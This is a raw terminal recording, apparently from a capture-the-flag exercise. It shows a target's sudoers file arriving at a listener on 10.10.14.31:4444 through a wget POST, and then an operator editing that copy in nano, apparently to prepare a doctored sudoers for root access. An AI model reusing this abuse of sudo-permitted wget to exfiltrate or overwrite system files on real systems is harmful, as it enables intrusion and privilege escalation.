[38.072116, "o", "\u001b[51;99r\u001b[1;1H\u001b[52;99r\u001b[48S\u001b[51;1H\u001b[K\u001b[97;112H\u001b[7m[ Reading... ]\u001b[1;100r\u001b[97;126H\u001b(B\u001b[m"]
[38.072352, "o", "\u001b[30D\u001b[7m[ Read 108 lines (Converted from DOS format) ]\u001b(B\u001b[m"]
[38.072946, "o", "\u001b[51;1H\u001b[7m  GNU nano 6.1                                                                                                       sudoers                                                                                                                \u001b[51;235H\u001b(B\u001b[m"]
[38.073266, "o", "\u001b[98;1H\u001b[7m^G\u001b(B\u001b[m Help\u001b[11C\u001b[7m^O\u001b(B\u001b[m Write Out\u001b[6C\u001b[7m^W\u001b(B\u001b[m Where Is\u001b[7C\u001b[7m^K\u001b(B\u001b[m Cut\u001b[12C\u001b[7m^T\u001b(B\u001b[m Execute\u001b[8C\u001b[7m^C\u001b(B\u001b[m Location\u001b[7C\u001b[7mM-U\u001b(B\u001b[m Undo\u001b[10C\u001b[7mM-A\u001b(B\u001b[m Set Mark\u001b[6C\u001b[7mM-]\u001b(B\u001b[m To Bracket    \u001b[7mM-Q\u001b(B\u001b[m Previous\u001b[6C\u001b[7m^B\u001b(B\u001b[m Back\u001b[11C\u001b[7m^◂\u001b(B\u001b[m Prev Word\u001b[6C\u001b[7m^A\u001b(B\u001b[m Home\r\n\u001b[7m^X\u001b(B\u001b[m Exit\u001b[11C\u001b[7m^R\u001b(B\u001b[m Read File\u001b[6C\u001b[7m^\\\u001b(B\u001b[m Replace\u001b[8C\u001b[7m^U\u001b(B\u001b[m Paste\u001b[10C\u001b[7m^J\u001b(B\u001b[m Justify\u001b[8C\u001b[7m^/\u001b(B\u001b[m Go To Line     \u001b[7mM-E\u001b(B\u001b[m Redo\u001b[10C\u001b[7mM-6\u001b(B\u001b[m Copy\u001b[10C\u001b[7m^Q\u001b(B\u001b[m Where Was\u001b[6C\u001b[7mM-W\u001b(B\u001b[m Next\u001b[10C\u001b[7m^F\u001b(B\u001b[m Forward\u001b[8C\u001b[7m^▸\u001b(B\u001b[m Next Word\u001b[6C\u001b[7m^E\u001b(B\u001b[m End"]
[38.073876, "o", "\u001b[52;1HPOST / HTTP/1.1\r\n"]
[38.07472, "o", "User-Agent: Wget/1.19.5 (solaris2.11)\r\nAccept: */*\r\nAccept-Encoding: identity\r\nHost: 10.10.14.31:4444\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 3254\u001b[61;1H\u001b[36m## sudoers file.\r\n##\r\n## This file MUST be edited with the 'visudo' command as root.\r\n## Failure to use 'visudo' may result in syntax or file permission errors\r\n## that prevent sudo from running.\r\n##\r\n## See the sudoers man page for the details on how to write a sudoers file.\r\n##\u001b[70;1H##\r\n## Host alias specification\r\n##\r\n## Groups of machines. These may include host names (optionally with wildcards),\r\n## IP addresses, network numbers or netgroups.\r\n# Host_Alias\u001b[38;5;208m    \u001b[36mWEBSERVERS = www1, www2, www3\u001b[77;1H##\r\n## User alias specification\r\n##\r\n## Groups of users.  These may consist of user names, uids, Unix groups,\r\n## or netgroups.\r\n# User_Alias\u001b[38;5;208m    \u001b[36mADMINS = millert, dowdy, mikef\u001b[84;1H##\r\n## Cmnd alias specification\r\n##\r\n## Groups of commands.  Often used to group related command"]
[38.074755, "o", "s together.\r\n# Cmnd_Alias\u001b[38;5;208m    \u001b[36mPROCESSES = /usr/bin/nice, /bin/kill, /usr/bin/renice, \\\r\n\u001b(B\u001b[m\u001b[36m# \u001b[38;5;208m                      \u001b[36m    /usr/bin/pkill, /usr/bin/top\r\n# Cmnd_Alias\u001b[38;5;208m    \u001b[36mREBOOT = /sbin/halt, /sbin/reboot, /sbin/poweroff\u001b[92;1H##\r\n## Defaults specification\r\n##\r\n## You may wish to keep some of the following environment variables\r\n## when running commands via sudo.\u001b[52;1H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"]
[38.792655, "o", "\u001b[51;126H\u001b[7m*\u001b[108C\u001b[?25l\u001b(B\u001b[m"]
[38.793679, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[A\u001b[36m##\u001b[39m\u001b[K\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h"]
[38.96521, "o", "\u001b[97d\u001b[?25l\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[A\u001b[36m## Locale settings\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"]
[39.118313, "o", "\u001b[97d\u001b[?25l"]
[39.118547, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[A\u001b[36m# Defaults env_keep += \"LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET\"\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"]
[39.270713, "o", "\u001b[97d\u001b[?25l\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[A\u001b[36m##\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"]
[39.424394, "o", "\u001b[?25l"]
[39.42589, "o", "\u001b[97d"]
[39.426189, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[A\u001b[36m## Run X applications through sudo; HOME is used to find the\u001b[1;100r\u001b[52;1H\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[39.595948, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[A\u001b[36m## .Xauthority file.  Note that other programs use HOME to find   \u001b[1;100r\u001b[52;1H\u001b(B\u001b[m"]
[39.7702, "o", "\u001b[97d\u001b[?25l\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[A\u001b[36m## configuration files and this may lead to privilege escalation!\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"]
[39.943044, "o", "\u001b[?25l\u001b[97d"]
[39.943198, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[A\u001b[36m# Defaults env_keep += \"HOME\"\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"]
[40.550409, "o", "\u001b[?25l\u001b[97d\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[96;1H"]
[40.550783, "o", "\u001b[36m##\u001b[52;1H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"]
[42.480292, "o", "\u001b[?25l"]
[42.480969, "o", "\u001b[?12l\u001b[?25h"]
[42.531845, "o", "\u001b[?25l\u001b[?12l\u001b[?25h"]
[42.582531, "o", "\u001b[?25l\u001b[?12l\u001b[?25h"]
[42.632844, "o", "\u001b[?25l"]
[42.633643, "o", "\u001b[?12l\u001b[?25h"]
[42.73452, "o", "\u001b[?25l\u001b[?12l\u001b[?25h"]
[42.784816, "o", "\u001b[?25l\u001b[?12l\u001b[?25h"]
[43.046216, "o", "\u001b[C\u001b[?25l"]
[43.047426, "o", "\u001b[36m Defaults env_keep += \"HOME\"\u001b[54;4HX11 resource path settings\u001b[39m\u001b[K\u001b[55;2H\u001b[36m Defaults env_keep += \"XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH\"\u001b[39m \u001b[56;3H\u001b[K\n\u001b[36m Desktop path settings\r\n# Defaults env_keep += \"QTDIR KDEDIR\"\u001b[39m\u001b[K\u001b[60;1H\u001b[36m## Allow sudo-run commands to inherit the callers' ConsoleKit session\r\n# Defaults env_keep += \"XDG_SESSION_COOKIE\"\u001b[39m\u001b[62;3H\u001b[K\n\u001b[36m Uncomment to enable special input methods.  Care should be taken as\u001b[64;4Hthis may allow users to subvert the command being run via sudo.\u001b[39m\u001b[K\u001b[65;2H\u001b[36m Defaults env_keep += \"XMODIFIERS GTK_IM_MODULE QT_IM_MODULE QT_IM_SWITCHER\"\r\n##\u001b[39m\u001b[K\r\n\u001b[36m## Uncomment to use a hard-coded PATH instead of the user's to find commands\r\n# Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"\u001b[39m\u001b[69;3H\u001b[K\n\u001b[36m Uncomment to send mail if the user does not enter the correct password.\r\n# Defaults mail_badpass\u001b[39m\u001b[K\u001b[72;3H\u001b[K\u001b[73;2H\u001b[36m# Uncomment to enable logging of a command's output, except for\r\n"]
[43.047476, "o", "## sudoreplay and reboot.  Use sudoreplay to play back logged sessions.\r\n# Defaults log_output\r\n# Defaults!/usr/bin/sudoreplay !log_output\r\n# Defaults!/usr/local/bin/sudoreplay !log_output\r\n# Defaults!REBOOT !log_output\u001b[39m\u001b[K\r\n\u001b[K\u001b[80;2H\u001b[36m#\u001b[39m\u001b[K\u001b[81;2H\u001b[36m# Runas alias specification\u001b[39m\u001b[K\r\n\u001b[36m##\u001b[39m\r\n\u001b[K\u001b[84;3H\u001b[K\n\u001b[36m User privilege specification\u001b[39m\u001b[86;3H\u001b[K\r\nroot ALL=(ALL) ALL\u001b[K\r\n\u001b[K\u001b[89;4H\u001b[36mUncomment to allow members of group wheel to execute any command\u001b[90;3H%wheel ALL=(ALL) ALL\u001b[39m\u001b[K\r\n\u001b[K\u001b[92;4H\u001b[36mSame thing without a password\u001b[39m\u001b[K\u001b[93;2H\u001b[36m %wheel ALL=(ALL) NOPASSWD: ALL\u001b[39m\u001b[K\r\n\u001b[K\u001b[95;2H\u001b[36m# Uncomment to allow members of group sudo to execute any command\r\n# %sudo\u001b[38;5;208m \u001b[36mALL=(ALL) ALL\u001b[52;1H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"]
[43.545994, "o", "\u001b[C\u001b[36m# Uncomment to allow members of group sudo to execute any command\r\n# %sudo\u001b[38;5;208m \u001b[36mALL=(ALL) ALL\u001b[39m\r\n\u001b[K\u001b[55;2H\u001b[?25l"]
[43.546247, "o", "\u001b[36m# Uncomment to allow any user to run sudo if they know the password\u001b[39m\u001b[K\u001b[56;3H\u001b[36m of the user they are running the command as (root by default).\r\n# Defaults targetpw  # Ask for the password of the target user\u001b[58;3HALL ALL=(ALL) ALL  # WARNING: only use this together with 'Defaults targetpw'\r\n\u001b(B\u001b[m"]
[43.546471, "o", "\u001b[K\u001b[60;4H"]
[43.546679, "o", "\u001b[36mRead drop-in files from /etc/sudoers.d\u001b[39m\u001b[K\u001b[61;2H"]
[43.547543, "o", "\u001b[36m# (the '#' here does not indicate a comment)\r\n#includedir /etc/sudoers.d\r\n\u001b[39msammy ALL=(root) NOPASSWD: /usr/bin/wget\u001b[K\r\nsunny ALL=(root) NOPASSWD: /root/troll\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B\u001b[K\r\n\u001b[K\u001b[2B\u001b[K\r\n\u001b[K\u001b[2B\u001b[K\r\n\u001b[K\u001b[44A\u001b[?12l\u001b[?25h"]
[43.596403, "o", "\u001b[?25l"]
[43.596643, "o", "\u001b[13B\u001b[?12l\u001b[?25h"]
[43.645856, "o", "\u001b[?25l"]
[43.645983, "o", "\u001b[?12l\u001b[?25h"]
[43.69654, "o", "\u001b[?25l"]
[43.697034, "o", "\u001b[?12l\u001b[?25h"]
[43.748449, "o", "\u001b[?25l"]
[43.74911, "o", "\u001b[?12l\u001b[?25h"]
[43.850832, "o", "\u001b[?25l\u001b[?12l\u001b[?25h"]
[43.950292, "o", "\u001b[?25l"]
[43.95072, "o", "\u001b[?12l\u001b[?25h"]
[44.000461, "o", "\u001b[?25l"]
[44.000925, "o", "\u001b[?12l\u001b[?25h"]
[44.051026, "o", "\u001b[?25l"]
[44.051338, "o", "\u001b[?12l\u001b[?25h"]
[44.101634, "o", "\u001b[?25l"]
[44.10202, "o", "\u001b[?12l\u001b[?25h"]
[44.486994, "o", "\u001b[?25l\u001b[A\u001b[?12l\u001b[?25h"]
[44.924553, "o", "\u001b[A"]
[46.040304, "o", "\u001b[?25l\u001b[7m\u001b[12A  GNU nano 6.1                                                                                                       sudoers *                                                                                                         \u001b(B\u001b[m\u001b[30m\u001b[43m[0/0]\u001b[49m\u001b[36m\u001b[52;1H## Uncomment to allow members of group sudo to execute any command\u001b[39m\u001b[K\u001b[36m\r\n# %sudo\u001b[38;5;208m \u001b[36mALL=(ALL) ALL\u001b[39m\u001b[K\r\n\u001b[K\u001b[36m\r\n## Uncomment to allow any user to run sudo if they know the password\u001b[39m\u001b[K\u001b[36m\r\n## of the user they are running the command as (root by default).\u001b[39m\u001b[K\u001b[36m\r\n# Defaults targetpw  # Ask for the password of the target user\u001b[39m\u001b[K\u001b[36m\r\n# ALL ALL=(ALL) ALL  # WARNING: only use this together with 'Defaults targetpw'\u001b[39m\u001b[K\r\n\u001b[K\u001b[36m\r\n## Read drop-in files from /etc/sudoers.d\u001b[39m\u001b[18X\u001b[18C \u001b[K\u001b[36m\r\n## (the '#' here does not indicate a comment)\u001b[39m\u001b[K\u001b[36m\r\n#includedir /etc/sudoers.d\u001b[39m\u001b[K\r\nsammy ALL=(root) NOPASSWD: /usr/bin/wget\u001b[19X\u001b[19C \u001b[K\r\nsunny ALL=(root) NOPASSWD: /root/troll\u001b[21X\u001b"]
[46.040565, "o", "[21C \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[7m\r\n^G\u001b(B\u001b[m Help\u001b[11X\u001b[7m\u001b[11C^O\u001b(B\u001b[m Write Out\u001b[6X\u001b[7m\u001b[6C^W\u001b(B\u001b[m Where Is\u001b[7X\u001b[7m\u001b[7C^K\u001b(B\u001b[m Cut\u001b[12X\u001b[7m\u001b[12C^T\u001b(B\u001b[m Execute\u001b[8X\u001b[7m\u001b[8C^C\u001b(B\u001b[m Location\u001b[7X\u001b[7m\u001b[7CM-U\u001b(B\u001b[m Undo\u001b[2X\u001b[2C \u001b[7X\u001b[7m\u001b[7CM-A\u001b(B\u001b[m Set Mark\u001b[6X\u001b[7m\u001b[6CM-]\u001b(B\u001b[m To Bracket    \u001b[7mM-Q\u001b(B\u001b[m Previous\u001b[6X\u001b[7m\u001b[6C^B\u001b(B\u001b[m Back\u001b[11X\u001b[7m\u001b[11C^◂\u001b(B\u001b[m Prev Word\u001b[6X\u001b[7m\u001b[6C^A\u001b(B\u001b[m Home\u001b[K\u001b[7m\r\n^X\u001b(B\u001b[m Exit\u001b[11X\u001b[7m\u001b[11C^R\u001b(B\u001b[m Read File\u001b[6X\u001b[7m\u001b[6C^\\\u001b(B\u001b[m Replace\u001b[8X\u001b[7m\u001b[8C^U\u001b(B\u001b[m Paste\u001b[10X\u001b[7m\u001b[10C^J\u001b(B\u001b[m Justify\u001b[8X\u001b[7m\u001b[8C^/\u001b(B\u001b[m Go To Line     \u001b[7mM-E\u001b(B\u001b[m Redo\u001b[2X\u001b[2C \u001b[7X\u001b[7m\u001b[7CM-6\u001b(B\u001b[m Copy\u001b[10X\u001b[7m\u001b[10C^Q\u001b(B\u001b[m Where Was\u001b[6X\u001b[7m\u001b[6CM-W\u001b(B\u001b[m Next\u001b[10X\u001b[7m\u001b[10C^F\u001b(B\u001b[m Forward\u001b[8X\u001b[7m\u001b[8C^▸\u001b(B\u001b[m Next Word\u001b[6X\u001b[7m\u001b[6C^E\u001b(B\u001b[m End\u001b[K\u001b[50;1H─────────────────────────────────"]
[46.040668, "o", "──────────────────────────────────────────────────────────────────────────────────────\u001b[33m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[63;1H\u001b[?2004l\u001b[?25l\u001b[13A───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[33m─"]
[46.040747, "o", "────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:[tmux]*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[63;1H"]
[47.002584, "o", "\u001b[53;8H\u001b[38;5;208m \u001b[60;60H\u001b[39m \u001b[63;1H\u001b[30m\u001b[43ms\u001b[58C\u001b[39m\u001b[49m \u001b[64;60H \u001b[98;119H \u001b[80C\u001b[7m◂\u001b[99;119H\u001b(B\u001b[m \u001b[80C\u001b[7m▸\u001b[63;1H\u001b(B\u001b[m"]
[47.067337, "o", "\u001b[30m\u001b[43msa\u001b[57C\u001b[39m\u001b[49m \u001b[2G"]
[47.567272, "o", "\r\u001b[30m\u001b[43msam\u001b[56C\u001b[39m\u001b[49m \u001b[3G"]
[47.61939, "o", "\r\u001b[30m\u001b[43msamm\u001b[55C\u001b[39m\u001b[49m \u001b[4G"]
[47.670011, "o", "\r\u001b[30m\u001b[43msammy\u001b[54C\u001b[39m\u001b[49m \u001b[5G"]
[47.7201, "o", "\r\u001b[30m\u001b[43msammy \u001b[53C\u001b[39m\u001b[49m \u001b[6G"]
[47.770955, "o", "\r\u001b[30m\u001b[43msammy A\u001b[52C\u001b[39m\u001b[49m \u001b[7G"]
[47.819876, "o", "\r\u001b[30m\u001b[43msammy AL\u001b[51C\u001b[39m\u001b[49m \u001b[8G"]
[47.870476, "o", "\r\u001b[30m\u001b[43msammy ALL\u001b[50C\u001b[39m\u001b[49m \u001b[9G"]
[47.920375, "o", "\r\u001b[30m\u001b[43msammy ALL=\u001b[49C\u001b[39m\u001b[49m \u001b[10G"]
[47.9705, "o", "\r\u001b[30m\u001b[43msammy ALL=(\u001b[48C\u001b[39m\u001b[49m \u001b[11G"]
[48.01968, "o", "\r\u001b[30m\u001b[43msammy ALL=(r\u001b[47C\u001b[39m\u001b[49m \u001b[12G"]
[48.070666, "o", "\r\u001b[30m\u001b[43msammy ALL=(ro\u001b[46C\u001b[39m\u001b[49m \u001b[13G"]
[48.119942, "o", "\r\u001b[30m\u001b[43msammy ALL=(roo\u001b[45C\u001b[39m\u001b[49m \u001b[14G"]
[48.17084, "o", "\r\u001b[30m\u001b[43msammy ALL=(root\u001b[44C\u001b[39m\u001b[49m \u001b[15G"]
[48.221328, "o", "\r\u001b[30m\u001b[43msammy ALL=(root)\u001b[43C\u001b[39m\u001b[49m \u001b[16G"]
[48.272012, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) \u001b[42C\u001b[39m\u001b[49m \u001b[17G"]
[48.322556, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) N\u001b[41C\u001b[39m\u001b[49m \u001b[18G"]
[48.373368, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NO\u001b[40C\u001b[39m\u001b[49m \u001b[19G"]
[48.423977, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOP\u001b[39C\u001b[39m\u001b[49m \u001b[20G"]
[48.474035, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPA\u001b[38C\u001b[39m\u001b[49m \u001b[21G"]
[48.52482, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPAS\u001b[37C\u001b[39m\u001b[49m \u001b[22G"]
[48.575173, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASS\u001b[36C\u001b[39m\u001b[49m \u001b[23G"]
[48.625895, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSW\u001b[35C\u001b[39m\u001b[49m \u001b[24G"]
[48.677237, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD\u001b[34C\u001b[39m\u001b[49m \u001b[25G"]
[48.727639, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD:\u001b[33C\u001b[39m\u001b[49m \u001b[26G"]
[48.777674, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: \u001b[32C\u001b[39m\u001b[49m \u001b[27G"]
[48.828925, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /\u001b[31C\u001b[39m\u001b[49m \u001b[28G"]
[48.879574, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /u\u001b[30C\u001b[39m\u001b[49m \u001b[29G"]
[48.930076, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /us\u001b[29C\u001b[39m\u001b[49m \u001b[30G"]
[48.981453, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr\u001b[28C\u001b[39m\u001b[49m \u001b[30D"]
[49.031451, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr/\u001b[27C\u001b[39m\u001b[49m \u001b[29D"]
[49.083545, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr/b\u001b[26C\u001b[39m\u001b[49m \u001b[28D"]
[49.13468, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr/bi\u001b[25C\u001b[39m\u001b[49m \u001b[27D"]
[49.186653, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr/bin\u001b[24C\u001b[39m\u001b[49m \u001b[26D"]
[49.236158, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr/bin/\u001b[23C\u001b[39m\u001b[49m \u001b[25D"]
[49.286733, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr/bin/w\u001b[22C\u001b[39m\u001b[49m \u001b[24D"]
[49.337786, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr/bin/wg\u001b[21C\u001b[39m\u001b[49m \u001b[23D"]
[49.576229, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr/bin/wge\u001b[20C\u001b[39m\u001b[49m \u001b[22D"]
[49.846596, "o", "\r\u001b[30m\u001b[43msammy ALL=(root) NOPASSWD: /usr/bin/wget\u001b[19C\u001b[39m\u001b[49m \u001b[21D"]
[50.550302, "o", "\u001b]52;;c2FtbXkgQUxMPShyb290KSBOT1BBU1NXRDogL3Vzci9iaW4vd2dldA==\u0007\r\u001b[?2004h"]
[50.551552, "o", "\u001b[?25l\u001b[7m\u001b[12A  GNU nano 6.1                                                                                                       sudoers *                                                                                                              \u001b(B\u001b[m\u001b[36m\u001b[52;1H## Uncomment to allow members of group sudo to execute any command\u001b[39m\u001b[K\u001b[36m\r\n# %sudo\u001b[38;5;208m \u001b[36mALL=(ALL) ALL\u001b[39m\u001b[K\r\n\u001b[K\u001b[36m\r\n## Uncomment to allow any user to run sudo if they know the password\u001b[39m\u001b[K\u001b[36m\r\n## of the user they are running the command as (root by default).\u001b[39m\u001b[K\u001b[36m\r\n# Defaults targetpw  # Ask for the password of the target user\u001b[39m\u001b[K\u001b[36m\r\n# ALL ALL=(ALL) ALL  # WARNING: only use this together with 'Defaults targetpw'\u001b[39m\u001b[K\r\n\u001b[K\u001b[36m\r\n## Read drop-in files from /etc/sudoers.d\u001b[39m\u001b[K\u001b[36m\r\n## (the '#' here does not indicate a comment)\u001b[39m\u001b[K\u001b[36m\r\n#includedir /etc/sudoers.d\u001b[39m\u001b[K\r\nsammy ALL=(root) NOPASSWD: /usr/bin/wget\u001b[K\r\nsunny ALL=(root) NOPASSWD: /root/troll\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K"]
[50.551603, "o", "\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[7m\r\n^G\u001b(B\u001b[m Help\u001b[11X\u001b[7m\u001b[11C^O\u001b(B\u001b[m Write Out\u001b[6X\u001b[7m\u001b[6C^W\u001b(B\u001b[m Where Is\u001b[7X\u001b[7m\u001b[7C^K\u001b(B\u001b[m Cut\u001b[12X\u001b[7m\u001b[12C^T\u001b(B\u001b[m Execute\u001b[8X\u001b[7m\u001b[8C^C\u001b(B\u001b[m Location\u001b[7X\u001b[7m\u001b[7CM-U\u001b(B\u001b[m Undo\u001b[10X\u001b[7m\u001b[10CM-A\u001b(B\u001b[m Set Mark\u001b[6X\u001b[7m\u001b[6CM-]\u001b(B\u001b[m To Bracket    \u001b[7mM-Q\u001b(B\u001b[m Previous\u001b[6X\u001b[7m\u001b[6C^B\u001b(B\u001b[m Back\u001b[11X\u001b[7m\u001b[11C^◂\u001b(B\u001b[m Prev Word\u001b[6X\u001b[7m\u001b[6C^A\u001b(B\u001b[m Home\u001b[K\u001b[7m\r\n^X\u001b(B\u001b[m Exit\u001b[11X\u001b[7m\u001b[11C^R\u001b(B\u001b[m Read File\u001b[6X\u001b[7m\u001b[6C^\\\u001b(B\u001b[m Replace\u001b[8X\u001b[7m\u001b[8C^U\u001b(B\u001b[m Paste\u001b[10X\u001b[7m\u001b[10C^J\u001b(B\u001b[m Justify\u001b[8X\u001b[7m\u001b[8C^/\u001b(B\u001b[m Go To Line     \u001b[7mM-E\u001b(B\u001b[m Redo\u001b[10X\u001b[7m\u001b[10CM-6\u001b(B\u001b[m Copy\u001b[10X\u001b[7m\u001b[10C^Q\u001b(B\u001b[m Where Was\u001b[6X\u001b[7m\u001b[6CM-W\u001b(B\u001b[m Next\u001b[10X\u001b[7m\u001b[10C^F\u001b(B\u001b[m Forward\u001b[8X\u001b[7m\u001b[8C^▸\u001b(B\u001b[m Next Word\u001b[6X\u001b[7m\u001b[6C^E\u001b(B\u001b[m End\u001b[K\u001b[50;1H──────────────────────────────────────────────────────"]
[50.551639, "o", "─────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:nano*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                      23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[63;1H"]
[51.13901, "o", "\u001b[?25l\r\n\u001b[?12l\u001b[?25h"]
[51.339149, "o", "\r\n"]
[52.121618, "o", "\u001b[?25l"]
[52.122187, "o", "sammy ALL=(root) NOPASSWD: /usr/bin/wget\u001b[?12l\u001b[?25h"]
[53.20344, "o", "\b \b"]
[53.378987, "o", "\b \b"]
[53.550611, "o", "\u001b[?25l\b \b\u001b[?12l\u001b[?25h"]
[53.760502, "o", "\u001b[?25ls\u001b[?12l\u001b[?25h"]
[54.115972, "o", "\b \b"]
[54.25349, "o", "\b \b"]
[54.334827, "o", "s"]
[54.49542, "o", "\u001b[?25lu\u001b[?12l\u001b[?25h"]
[54.801545, "o", "\u001b[?25l"]
[54.801868, "o", "\u001b[97;1H\u001b[7mSave modified buffer?                                                                                                                                                                                                                       \u001b[98;1H Y\u001b(B\u001b[m Yes\u001b[K\r\n\u001b[7m N\u001b(B\u001b[m No  \u001b[9C\u001b[7m^C\u001b(B\u001b[m Cancel\u001b[K\u001b[97;23H\u001b[?12l\u001b[?25h"]
[55.487759, "o", "\u001b[?25l"]
[55.487812, "o", "\r\n\u001b[7m^G\u001b(B\u001b[m Help\u001b[52C\u001b[7mM-D\u001b(B\u001b[m DOS Format\u001b[45C\u001b[7mM-A\u001b(B\u001b[m Append\u001b[49C\u001b[7mM-B\u001b(B\u001b[m Backup File\r\n\u001b[7m^C\u001b(B\u001b[m Cancel\u001b[7C         \u001b[34C\u001b[7mM-M\u001b(B\u001b[m Mac Format\u001b[45C"]
[55.48796, "o", "\u001b[97;1H\u001b[7mFile Name to Write [DOS Format]: sudoers\u001b[99;119HM-P\u001b(B\u001b[m Prepend\u001b[48C\u001b[7m^T\u001b(B\u001b[m Browse\u001b[97;41H\u001b[?12l\u001b[?25h"]
[57.215365, "o", "\r\u001b[7mFile Name to Write: sudoers                                                                                                                                                                                                                 \u001b[97;28H\u001b(B\u001b[m"]
[58.374402, "o", "\u001b[83C\u001b[?25l"]
[58.374722, "o", "\b\u001b[1K\u001b[C "]
[58.374955, "o", "\u001b[7m[ Writing... ]\u001b(B\u001b[m\u001b[K"]
[58.377717, "o", "\u001b[46A\u001b[7m \u001b[97;109H[ Wrote 100 lines ]\r\u001b(B\u001b[m"]
